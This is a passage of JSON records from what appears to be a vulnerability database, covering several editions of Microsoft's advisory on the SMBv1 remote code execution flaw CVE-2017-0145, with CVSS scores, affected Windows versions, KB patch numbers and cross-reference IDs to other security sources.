{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": 
"", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", 
"kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-09T06:50:25", "differentElements": ["msAffectedSoftware"], "edition": 24}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-10T08:45:32", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", 
"MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", 
"RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4012215", "KB3177186", "KB3205409", "KB4012598", "KBMS16-110, 3187754", "KB3213986", "KB4012217", "KB4013198", "KB4013429", "KB3210720", "KB4012606", "KB4012213", "KB3210721", "KB4012216", "KB4012214", "KB4012212", "KB4014077", "KB3212646"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", 
"kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", 
"msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": 
"KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems 
Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 
x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T08:45:32", "differentElements": ["msAffectedSoftware"], "edition": 25}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-10T10:45:12", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": 
["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB4013198", "KB4012213", "KB3205409", "KB4012598", "KB4012216", "KB4014077", "KB4012217", "KB4012212", "KB3177186", "KB3210720", "KB3213986", "KB3205401", "KB4012606", "KB3210721", "KB4013429", "KB4012215", "KBMS16-110, 3187754", "KB3212646"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": 
"", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 